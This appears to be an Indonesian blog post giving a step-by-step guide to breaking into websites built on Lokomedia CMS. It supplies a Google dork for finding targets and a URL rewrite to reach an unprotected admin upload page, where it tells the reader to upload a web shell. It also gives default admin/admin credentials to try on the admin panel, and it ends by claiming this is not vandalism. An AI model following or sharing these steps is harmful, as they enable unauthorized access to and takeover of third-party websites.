Bug CMS Lokomedia | Cara Bug CMS Lokomedia
Langsung saja...
1. masuk google www.google.com
2. Masukan dork ini "inurl:semua-download.html" tanpa kutip 2
3. setelah menemukan target ex: www.site.com/semua-download.html
Inject : ganti semua-download.html jadi adminweb/content.php?module=download
Ex : www.site.com/semua-download.html menjadi www.site.com/adminweb/content.php?module=download
kalau terdapat bugnya nanti ada file file yg sudah diupload , dan ada tulisan Tambah Download dan upload Shell nya
Cara ke 2
Dork : inurl:semua-download.html
Inject : /adminweb/
ex: site.com/semua-download.html
menjadi site.co/adminweb/
biasanya para admin melakukan kesalahan dengan menggunakan user dan password default
User : admin
Pass : admin
Jika disalah satu web target adminnya lengah kita bisa masuk ke modul admin..
INI BUKAN MERUSAK , INI HANYA MENCARI KELEMAHAN PADA ADMIN..!!
No comments:
Post a Comment